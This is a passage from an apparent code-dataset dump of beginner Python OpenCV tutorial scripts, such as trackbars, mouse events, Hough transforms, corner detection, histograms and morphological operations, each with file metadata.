pass\r\n\r\ncv2.namedWindow('Tracking')\r\ncv2.createTrackbar('LH','Tracking',0,255,nothing)\r\ncv2.createTrackbar('LS','Tracking',0,255,nothing)\r\ncv2.createTrackbar('LV','Tracking',0,255,nothing)\r\ncv2.createTrackbar('UH','Tracking',255,255,nothing)\r\ncv2.createTrackbar('US','Tracking',255,255,nothing)\r\ncv2.createTrackbar('UV','Tracking',255,255,nothing)\r\n\r\nwhile(True):\r\n frame= cv2.imread('smarties.png')\r\n\r\n hsv= cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\r\n\r\n l_h= cv2.getTrackbarPos('LH','Tracking')\r\n l_s= cv2.getTrackbarPos('LS','Tracking')\r\n l_v= cv2.getTrackbarPos('LV','Tracking')\r\n u_h= cv2.getTrackbarPos('UH','Tracking')\r\n u_s= cv2.getTrackbarPos('US','Tracking')\r\n u_v= cv2.getTrackbarPos('UV','Tracking')\r\n\r\n #Getting lower & upper color range to use it in a mask\r\n lower_bound= np.array([l_h, l_s, l_v])\r\n upper_bound= np.array([u_h, u_s, u_v])\r\n\r\n #Getting mask of above color range from the image\r\n mask= cv2.inRange(hsv, lower_bound, upper_bound)\r\n\r\n result= cv2.bitwise_and(frame,frame, mask=mask) \r\n\r\n cv2.imshow('frame',frame)\r\n cv2.imshow('mask',mask)\r\n cv2.imshow('result',result)\r\n\r\n if cv2.waitKey(1) & 0xFF== ord('q'):\r\n break\r\n\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.5774155855178833, "alphanum_fraction": 0.6891734600067139, "avg_line_length": 33.79166793823242, "blob_id": "b1f2ecc4b767e0a3ed06d1a6f2f44806202e072c", "content_id": "e594e26847e5188e0ea5a1e3a0e4aae5ce62720a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 859, "license_type": "no_license", "max_line_length": 153, "num_lines": 24, "path": "/Draw geometric shapes on images.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\nimg= cv2.imread('lena.jpg',1)\r\n\r\n#Drawing straight line in an image:\r\nimg= cv2.line(img, pt1=(0,0), pt2=(255,255), color=(25,32,130), thickness=5)\r\n#If we want to draw a line with customized color then use rgb color picker from google and use it in BGR format\r\n\r\n#Drawing arrowed line in an image:\r\nimg= cv2.arrowedLine(img, (0,255), (255,255), (255,0,0), 5)\r\n\r\n#Drawing rectangle in an image:\r\nimg= cv2.rectangle(img, pt1=(384,0), pt2=(510,128), color=(0,255,0), thickness=5)\r\n\r\n#Drawing circle in an image:\r\nimg= cv2.circle(img, center=(280,125), radius=60, color=(0,0,255), thickness=5)\r\n\r\n#Adding Text in an image:\r\nimg= cv2.putText(img, text='Lena', org=(10,500), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=4, lineType= cv2.LINE_AA, color=(255,255,255), thickness=5)\r\n\r\ncv2.imshow('image',img)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n" }, { "alpha_fraction": 0.5226536989212036, "alphanum_fraction": 0.5744336843490601, "avg_line_length": 23.83333396911621, "blob_id": "03c3bac44a9d0e149ed1b78b998841af00c8e111", "content_id": "51d732fd52cc71bd437be82f921f0e7f3eebdafe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 618, "license_type": "no_license", "max_line_length": 53, "num_lines": 24, "path": "/Mouse Events 3.0.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\ndef click_event(event, x, y, flags, param):\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n blue= img[y,x,0]\r\n green= img[y,x,1]\r\n red= img[y,x,2]\r\n cv2.circle(img, (x, y), 3, (0,0,255), -1)\r\n mycolorimage= np.zeros((512,512,3), np.uint8)\r\n \r\n mycolorimage[:]= [blue, green, red]\r\n \r\n cv2.imshow('color', mycolorimage)\r\n \r\nimg= cv2.imread('lena.jpg',1)\r\ncv2.imshow('image',img)\r\npoints= []\r\n\r\ncv2.setMouseCallback('image', click_event)\r\n\r\ncv2.waitKey(0)\r\ncv2.imwrite('lena_mouse_events_3.0.jpg',img)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6877990365028381, "alphanum_fraction": 0.7117224931716919, "avg_line_length": 26.827587127685547, "blob_id": "b0ebb05d4b04f494c5d34dd7cfedf46fe0ab0efb", "content_id": "2ced9b1e7b5f7e99c22e7b2138996ee13245e7b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 836, "license_type": "no_license", "max_line_length": 108, "num_lines": 29, "path": "/Background Subtraction in a video.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\nimport numpy as np\r\n\r\ncap=cv2.VideoCapture('vtest.avi')\r\n\r\n#createBackgroundSubtractorMOG is a Gaussian Mixture-based Background/Foreground segmentation algorithm.\r\nfgbg1= cv2.createBackgroundSubtractorMOG2()\r\n\r\n#createBackgroundSubtractorKNN is a K-nearest neighbours-based Background/Foreground segmentation algorithm.\r\nfgbg2= cv2.createBackgroundSubtractorKNN(detectShadows=False)\r\n\r\nwhile True:\r\n ret, frame= cap.read()\r\n if frame is None:\r\n break\r\n\r\n #Applying background subtraction method on frame \r\n fgmask1= fgbg1.apply(frame) \r\n fgmask2= fgbg2.apply(frame) \r\n\r\n cv2.imshow('Frame', frame)\r\n cv2.imshow('GMM FG Mask Frame', fgmask1)\r\n cv2.imshow('KNN FG Mask Frame', fgmask2)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n" }, { "alpha_fraction": 0.5625841021537781, "alphanum_fraction": 0.6137281060218811, "avg_line_length": 19.285715103149414, "blob_id": "610542d75fb98e29be165658e0fe9782ef353167", "content_id": "4ba2b3321da79391a0cafb94c1229ece2d294f84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 743, "license_type": "no_license", "max_line_length": 62, "num_lines": 35, "path": "/Trackbar Windows_2.0.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\ncv2.namedWindow('image')\r\n\r\ndef nothing(x):\r\n print(x)\r\n\r\nswitch= 'color/gray'\r\n\r\n#Creating Trackbar\r\ncv2.createTrackbar('CP','image',10,400,nothing)\r\ncv2.createTrackbar(switch,'image',0,1,nothing)\r\n\r\nwhile(True):\r\n img= cv2.imread('lena.jpg')\r\n \r\n #Printing current position in the TrackBar\r\n pos= cv2.getTrackbarPos('CP','image')\r\n font= cv2.FONT_HERSHEY_SIMPLEX\r\n cv2.putText(img,str(pos), (50,150), font, 4, (0,0,255),10)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n s=cv2.getTrackbarPos(switch,'image')\r\n\r\n if s==0:\r\n pass\r\n else:\r\n img= cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n \r\n img= cv2.imshow('image',img)\r\n\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6472945809364319, "alphanum_fraction": 0.7014027833938599, "avg_line_length": 21.85714340209961, "blob_id": "97ed7ba78d7e10ba163388a684218e0ecb42ec6c", "content_id": "4a0d02326c0c2fdf35cca88fc51f34705877dcc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 499, "license_type": "no_license", "max_line_length": 94, "num_lines": 21, "path": "/Shi Tomasi Corner Detector.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\n\r\nimg= cv2.imread('left01.jpg')\r\ncv2.imshow('img', img)\r\n\r\ngray= cv2.cvtColor(src=img, code=cv2.COLOR_BGR2GRAY)\r\n\r\ncorners= cv2.goodFeaturesToTrack(image=gray, maxCorners=50, qualityLevel=0.01, minDistance=10)\r\ncorners= np.uint0(corners)\r\n\r\n#Drawing circles in each detected corners\r\nfor i in corners:\r\n x, y= i.ravel()\r\n cv2.circle(img=img,center=(x, y), radius=3, color=255, thickness=-1)\r\n\r\ncv2.imshow('dst', img)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.572139322757721, "alphanum_fraction": 0.6231343150138855, "avg_line_length": 21.02857208251953, "blob_id": "79889204b1d583bdc8eb1cf34105db785439878a", "content_id": "74b1fde9b8b49930fbc8a862d4e3f99bef110991", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 804, "license_type": "no_license", "max_line_length": 46, "num_lines": 35, "path": "/Trackbar Windows_1.0.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\n#creating black image using numpy\r\nimg= np.zeros((300,512,3), np.uint8)\r\ncv2.namedWindow('image')\r\n\r\ndef nothing(x):\r\n print(x)\r\n\r\nswitch= '0:OFF\\n1:ON'\r\n\r\n#Creating Trackbar\r\ncv2.createTrackbar('B','image',0,255,nothing)\r\ncv2.createTrackbar('G','image',0,255,nothing)\r\ncv2.createTrackbar('R','image',0,255,nothing)\r\ncv2.createTrackbar(switch,'image',0,1,nothing)\r\n\r\nwhile(True):\r\n cv2.imshow('image',img)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n #Checking the position of Trackbar\r\n b= cv2.getTrackbarPos('B','image')\r\n g= cv2.getTrackbarPos('G','image')\r\n r= cv2.getTrackbarPos('R','image')\r\n s=cv2.getTrackbarPos(switch,'image')\r\n\r\n if s==0:\r\n img[:]=0\r\n else:\r\n img[:]= [b,g,r]\r\n\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6283048391342163, "alphanum_fraction": 0.6967340707778931, "avg_line_length": 35.82352828979492, "blob_id": "aa015066abdce917f67ad23b1d2505192fff3c73", "content_id": "8617defd20b5b099c1f504bbc9388cdf994f5317", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 643, "license_type": "no_license", "max_line_length": 130, "num_lines": 17, "path": "/Circle Detection using Hough Circle Transform.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\nimport numpy as np\r\n\r\nimg= cv2.imread('smarties.png')\r\ngray= cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\ngray= cv2.medianBlur(src=gray, ksize=5)\r\ncircles= cv2.HoughCircles(image=gray, method=cv2.HOUGH_GRADIENT, dp=1, minDist=20, param1=50, param2=30, minRadius=0, maxRadius=0)\r\ndetected_circles= np.uint16(np.around(circles))\r\n\r\nfor (x, y, r) in detected_circles[0, :]:\r\n cv2.circle(img=img, center=(x, y), radius=r, color=(0,255,0), thickness=3)\r\n #drawing centre of the circle\r\n cv2.circle(img=img, center=(x, y), radius=2, color=(0,255,255), thickness=3)\r\n\r\ncv2.imshow('Image',img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n" }, { "alpha_fraction": 0.6078066825866699, "alphanum_fraction": 0.7007434964179993, "avg_line_length": 31.75, "blob_id": "22496bcfd668291f7a4ca353960dada50d3ed935", "content_id": "162eee28947b64cf604519084dca975808c6a70d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 538, "license_type": "no_license", "max_line_length": 108, "num_lines": 16, "path": "/Probabilistic Hough Transform using HoughLinesP.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\nimg= cv2.imread('sudoku.png')\r\ngray_img= cv2.cvtColor(src=img, code=cv2.COLOR_BGR2GRAY)\r\nedges= cv2.Canny(image=gray_img, threshold1=50, threshold2=150, apertureSize=3)\r\nlines= cv2.HoughLinesP(image=edges, rho=1, theta=np.pi/180, threshold=100, minLineLength=100, maxLineGap=10)\r\n\r\nfor line in lines:\r\n x1, y1, x2, y2= line[0]\r\n cv2.line(img=img, pt1=(x1, y1), pt2=(x2, y2), color=(0,255,0), thickness=2)\r\n\r\ncv2.imshow('Edge',edges)\r\ncv2.imshow('Image',img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6739130616188049, "alphanum_fraction": 0.7220497131347656, "avg_line_length": 24.91666603088379, "blob_id": "e6f20560eef7c7240174e21911bee6be38805529", "content_id": "9b81276905b9c48a33cc8c34ab8c31c1c0bc5e73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 644, "license_type": "no_license", "max_line_length": 119, "num_lines": 24, "path": "/Harris Corner Detector.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\n\r\nimg= cv2.imread('left01.jpg')\r\ncv2.imshow('img', img)\r\n\r\ngray= cv2.cvtColor(src=img, code=cv2.COLOR_BGR2GRAY)\r\ngray=np.float32(gray)\r\n\r\ndst= cv2.cornerHarris(src=gray, blockSize=2, ksize=3, k=0.04)\r\n#blocksize= 2*2 neighbourhood\r\n#ksize= Aperture parameter of Sobel derivative used.\r\n#k= Harris detector free parameter in the equation\r\n\r\ndst= cv2.dilate(src=dst, kernel=None)\r\n\r\n#Reverting back to the original image with optimal threshould value and marking all the detected corners with red color\r\nimg[dst > 0.01 * dst.max()] = [0,0,255]\r\n\r\ncv2.imshow('dst', img)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6224226951599121, "alphanum_fraction": 0.6945876479148865, "avg_line_length": 29.1200008392334, "blob_id": "dc39dbb8fcb0067db973b10f9e5b43222b536aeb", "content_id": "fe7b06beceddbbfc8d85a43e38fa5c6ef5e6187f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 776, "license_type": "no_license", "max_line_length": 107, "num_lines": 25, "path": "/Histogram using OpenCV.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg= cv2.imread('lena.jpg',0)\r\n\r\n#Creating a mask\r\nmask= np.zeros(img.shape, np.uint8)\r\nmask[100:400, 100:400]= 255\r\n\r\nmasked_img= cv2.bitwise_and(img, img, mask= mask)\r\n\r\n#Calculate histogram with mask and without mask\r\nhist_img= cv2.calcHist(images=[img], channels=[0], mask=None, histSize=[256], ranges=[0,256])\r\nhist_masked_img= cv2.calcHist(images=[masked_img], channels=[0], mask=mask, histSize=[256], ranges=[0,256])\r\n\r\nplt.subplot(3,2,1), plt.imshow(img,'gray')\r\nplt.subplot(3,2,2), plt.imshow(mask, 'gray')\r\nplt.subplot(3,2,3), plt.imshow(masked_img, 'gray')\r\nplt.subplot(3,2,4), plt.plot(hist_img)\r\nplt.subplot(3,2,5), plt.plot(hist_masked_img)\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7413479089736938, "avg_line_length": 33.48387145996094, "blob_id": "6420f242381b84b9c68245ad1b4f2a0e08c86e1c", "content_id": "07e3cd6fb92fb616c66d5c2743ca49a45d8e4672", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1098, "license_type": "no_license", "max_line_length": 157, "num_lines": 31, "path": "/Image Pyramids.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "#Pyramid representation is a type of multi-scale signal representation in which an Image is subject to repeated smoothing and subsampling.\r\n#Two types: (i)Gaussian Pyramid (ii)Laplacian Pyramid.\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nimg= cv2.imread('lena.jpg',1)\r\nlayer= img.copy()\r\ngaussian_pyramid= [layer]\r\n\r\nfor i in range(6):\r\n layer= cv2.pyrDown(layer)\r\n gaussian_pyramid.append(layer)\r\n cv2.imshow(str(i), layer)\r\n\r\n#Laplacian Pyramids are formed using Gaussian Pyramid.\r\n#A level in Laplacian Pyramid is formed by the difference between that level in Gaussian Pyramid and expanded version of its upper level in Gaussian Pyramid.\r\n#Laplacian Pyramids are used in Blending and Reconstruction of Images. \r\n\r\nlayer= gaussian_pyramid[5]\r\ncv2.imshow('upper level Gaussian Pyramid', layer)\r\nlaplacian_pyramid= [layer]\r\n\r\nfor i in range(5, 0, -1):\r\n gaussian_extended= cv2.pyrUp(gaussian_pyramid[i])\r\n laplacian= cv2.subtract(src1=gaussian_pyramid[i-1], src2=gaussian_extended)\r\n cv2.imshow(str(i), laplacian)\r\n\r\ncv2.imshow('Original', img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.5352532267570496, "alphanum_fraction": 0.6216484904289246, "avg_line_length": 34.03571319580078, "blob_id": "7107df0141f4bd74401ba853ca847005b7349d9c", "content_id": "a0f649742d4bb4914337511e2ef7cfb19ad85007", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1007, "license_type": "no_license", "max_line_length": 79, "num_lines": 28, "path": "/Hough Line Transform using HoughLines method.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\nimg= cv2.imread('sudoku.png')\r\ngray_img= cv2.cvtColor(src=img, code=cv2.COLOR_BGR2GRAY)\r\nedges= cv2.Canny(image=gray_img, threshold1=50, threshold2=150, apertureSize=3)\r\nlines= cv2.HoughLines(image=edges, rho=1, theta=np.pi/180, threshold=200)\r\n\r\nfor line in lines:\r\n rho, theta= line[0]\r\n a= np.cos(theta)\r\n b= np.sin(theta)\r\n x0= a*rho\r\n y0= b*rho\r\n #x1 stores the rounded off value of (r * cos(theta) - 1000 * sin(theta))\r\n x1= int(x0 + 1000 * (-b))\r\n #y1 stores the rounded off value of (r * sin(theta) + 1000 * cos(theta))\r\n y1= int(y0 + 1000 * (a))\r\n #x2 stores the rounded off value of (r * cos(theta) + 1000 * sin(theta))\r\n x2= int(x0 - 1000 * (-b))\r\n #y2 stores the rounded off value of (r * sin(theta) - 1000 * cos(theta))\r\n y2= int(y0 - 1000 * (a))\r\n cv2.line(img=img, pt1=(x1, y1), pt2=(x2, y2), color=(0,0,255), thickness=2)\r\n\r\ncv2.imshow('Edge',edges)\r\ncv2.imshow('Image',img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.5773955583572388, "alphanum_fraction": 0.6560196280479431, "avg_line_length": 19.526315689086914, "blob_id": "73f8f016423e7b11fde4552a83f945af516cb92e", "content_id": "55398725ef35f92c8fe3ea9e102310eca06da3f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 407, "license_type": "no_license", "max_line_length": 44, "num_lines": 19, "path": "/Histogram on Lena Image using matplotlib.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg= cv2.imread('lena.jpg',1)\r\nb, g, r= cv2.split(img)\r\n\r\ncv2.imshow('img',img)\r\ncv2.imshow('Blue',b)\r\ncv2.imshow('Green',g)\r\ncv2.imshow('Red',r)\r\n\r\nplt.hist(b.ravel(), bins=256, range=[0,256])\r\nplt.hist(g.ravel(), bins=256, range=[0,256])\r\nplt.hist(r.ravel(), bins=256, range=[0,256])\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6113795042037964, "alphanum_fraction": 0.6570048332214355, "avg_line_length": 49.80555725097656, "blob_id": "0e6742cecaea688c2646c816ec2699b9d58d9c14", "content_id": "b067228ac28bfe23faefb63573d96cea1535ca28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1863, "license_type": "no_license", "max_line_length": 131, "num_lines": 36, "path": "/Detecting Simple Geometrical Shapes on Image.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg= cv2.imread('shapes.png',0)\r\n_, thresh= cv2.threshold(src=img, thresh=240, maxval=255, type=cv2.THRESH_BINARY)\r\ncontours, _= cv2.findContours(image=thresh, mode=cv2.RETR_TREE, method=cv2.CHAIN_APPROX_NONE)\r\n\r\nfor contour in contours:\r\n approx= cv2.approxPolyDP(curve=contour, epsilon=0.01*cv2.arcLength(contour, True), closed=True)\r\n #cv2.approxPolyDp detects the number of polygonal curves with precision.\r\n cv2.drawContours(image=img, contours=[approx], contourIdx=0, color=(0,0,0), thickness=5)\r\n #Printing out the shape\r\n x= approx.ravel()[0] #x-coordinate\r\n y= approx.ravel()[1] #y-coordinate\r\n if len(approx)== 3:\r\n cv2.putText(img=img, text='Triangle', org=(x, y), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0))\r\n elif len(approx)== 4:\r\n #Deciding whether the shape is square or rectangle\r\n x, y, w, h= cv2.boundingRect(approx)\r\n aspectRatio= float(w)/h\r\n print(aspectRatio)\r\n if aspectRatio >= 0.95 and aspectRatio <= 1.05:\r\n cv2.putText(img=img, text='Square', org=(x, y), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0))\r\n else:\r\n cv2.putText(img=img, text='Rectangle', org=(x, y), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0)) \r\n elif len(approx)== 5:\r\n cv2.putText(img=img, text='Pentagon', org=(x, y), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0))\r\n elif len(approx)== 6:\r\n cv2.putText(img=img, text='Hexagon', org=(x, y), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0))\r\n else:\r\n cv2.putText(img=img, text='Circle', org=(x, y), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0))\r\n\r\ncv2.imshow('shapes',img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.5941422581672668, "alphanum_fraction": 0.6474895477294922, "avg_line_length": 27.875, "blob_id": "6b8420518781ee83fb6813fd2ea6e5fa16b0a7e2", "content_id": "0df0c62db331c1c9a78a2d251a168f88f156ac83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 956, "license_type": "no_license", "max_line_length": 75, "num_lines": 32, "path": "/Grabbing Objects from an Image (RoI).py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\nimg= cv2.imread('messi5.jpg',1)\r\n\r\nprint(img.shape) #returns the tuple of number of rows,columns,and channels\r\nprint(img.size) #returns total number of pixels is accessed\r\nprint(img.dtype) #returns image datatype \r\n\r\nb,g,r= cv2.split(img)\r\nimg= cv2.merge((b,g,r))\r\n\r\n#Grabbing the location of ball (our RoI) with mouse event:\r\ndef click_event(event, x, y, flags, param):\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n print(x, ', ', y)\r\n font= cv2.FONT_HERSHEY_COMPLEX\r\n line= cv2.LINE_AA\r\n strXY= str(x) + ', ' + str(y) \r\n cv2.putText(img, strXY, (x, y), font, 0.5, (255,25,12), 1, line)\r\n cv2.imshow('image',img)\r\n\r\n#Coping the ball(Region of Interest) part and placing it to other location:\r\nball= img[280:340,330:390]\r\nimg[273:333,100:160]= ball\r\n\r\ncv2.imshow('image',img)\r\n\r\ncv2.setMouseCallback('image', click_event)\r\ncv2.imwrite('messi_ball.jpg',img)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n" }, { "alpha_fraction": 0.5233463048934937, "alphanum_fraction": 0.5836575627326965, "avg_line_length": 25.157894134521484, "blob_id": "ab9713512581e82752bd3e087bccce5f5d76c1ac", "content_id": "2bb99c77d43ebdce42f1ba0585b9efc2e9648f68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 514, "license_type": "no_license", "max_line_length": 62, "num_lines": 19, "path": "/Mouse Events 2.0.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\ndef click_event(event, x, y, flags, param):\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n cv2.circle(img, (x, y), 3, (0,0,255), -1)\r\n points.append((x, y))\r\n if len(points) >=2:\r\n cv2.line(img,points[-1], points[-2], (255,0,0), 1)\r\n cv2.imshow('image',img)\r\n \r\nimg= cv2.imread('lena.jpg',1)\r\ncv2.imshow('image',img)\r\npoints= []\r\n\r\ncv2.setMouseCallback('image', click_event)\r\n\r\ncv2.waitKey(0)\r\ncv2.imwrite('lena_mouse_events_2.0.jpg',img)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.734910249710083, "alphanum_fraction": 0.7707993388175964, "avg_line_length": 45.230770111083984, "blob_id": "ab2bc7b15b060fa7357866b07331a52389a713de", "content_id": "856eba834f62beabffee4bf63c5b587b221e88fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1226, "license_type": "no_license", "max_line_length": 147, "num_lines": 26, "path": "/Adaptive Thresholding on Sudoku Image.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "#Adaptive Thresholding calculates thresholds for a smaller region of the Image. \r\n#Hence we get different thresholding values for different regions of the same image.\r\n#It is useful in the images in which the lighting conditionds vary pixel to pixel.\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nimg= cv2.imread('sudoku.png',0)\r\n\r\n_, th1= cv2.threshold(src=img, thresh=127, maxval=255, type=cv2.THRESH_BINARY)\r\n\r\nth2= cv2.adaptiveThreshold(src=img, maxValue=255, adaptiveMethod=cv2.ADAPTIVE_THRESH_MEAN_C, thresholdType=cv2.THRESH_BINARY, blockSize=11,C=2)\r\n#cv2.ADAPTIVE_THRESH_MEAN_C method provides mean of the neighbourhood pixels(i.e. block size) as a threshold value. \r\n# C Constant subtracted from the mean.\r\n\r\nth3= cv2.adaptiveThreshold(src=img, maxValue=255, adaptiveMethod=cv2.ADAPTIVE_THRESH_GAUSSIAN_C, thresholdType=cv2.THRESH_BINARY, blockSize=11,C=2)\r\n#cv2.ADAPTIVE_THRESH_GAUSSIAN_C method provides gaussian weighted sum of the neighbourhood pixels(i.e. block size) as a threshold value.\r\n# C Constant subtracted from the sum.\r\n\r\ncv2.imshow('Input Image',img)\r\ncv2.imshow('Binary Thres',th1)\r\ncv2.imshow('Adaptive Mean Thres',th2)\r\ncv2.imshow('Adaptive Gaussian Thres',th3)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6767676472663879, "alphanum_fraction": 0.7171717286109924, "avg_line_length": 20.11111068725586, "blob_id": "3b36b1b1a36ef17f111ae3fddf033c8910f068cb", "content_id": "d85ca6f2371b60d7e16e30c7e5f61a8df1492eb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "no_license", "max_line_length": 83, "num_lines": 18, "path": "/getting started with matplotlib.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg1= cv2.imread('lena.jpg',1)\r\ncv2.imshow('cv2 Image',img1)\r\n\r\n#matplotlib read image in RGB formate. Hence, we have to convert BGR to RGB format.\r\nimg2=cv2.cvtColor(img1,cv2.COLOR_BGR2RGB)\r\n\r\nplt.imshow(img2)\r\n#To remove xticks and yticks\r\n#plt.xticks([])\r\n#plt.yticks([])\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6790980100631714, "alphanum_fraction": 0.7094535827636719, "avg_line_length": 36.5, "blob_id": "c874ac242af77ae1f7628a4c14bac9bc5bafcf97", "content_id": "9207cdcf4e4a71fdc5a3f86387e1c6853de0e27e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1153, "license_type": "no_license", "max_line_length": 113, "num_lines": 30, "path": "/Morphological operations on Image.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg= cv2.imread('smarties.png',0)\r\n_, masked_img= cv2.threshold(img, 220, 255, cv2.THRESH_BINARY_INV)\r\n\r\nkernal= np.ones((3,3), np.uint8)\r\ndilation= cv2.dilate(src= masked_img, kernel=kernal, iterations=2)\r\nerosion= cv2.erode(src=masked_img, kernel=kernal, iterations=2)\r\nopening= cv2.morphologyEx(src= masked_img, op=cv2.MORPH_OPEN, kernel=kernal)\r\nclosing= cv2.morphologyEx(src= masked_img, op=cv2.MORPH_CLOSE, kernel=kernal)\r\ngradient= cv2.morphologyEx(src= masked_img, op=cv2.MORPH_GRADIENT, kernel=kernal)\r\ntophat= cv2.morphologyEx(src= masked_img, op=cv2.MORPH_TOPHAT, kernel=kernal)\r\nblackhat= cv2.morphologyEx(src= masked_img, op=cv2.MORPH_BLACKHAT, kernel=kernal)\r\n\r\ntitles= ['smarties', 'masked img', 'dilation', 'erosion', 'opening', 'closing', 'gradient', 'tophat', 'blackhat']\r\nimages= [img, masked_img, dilation, erosion, opening, closing, gradient, tophat, blackhat]\r\n\r\nfor i in range(9):\r\n plt.subplot(3,3,i+1)\r\n plt.imshow(images[i],'gray')\r\n plt.title(titles[i])\r\n plt.xticks([])\r\n 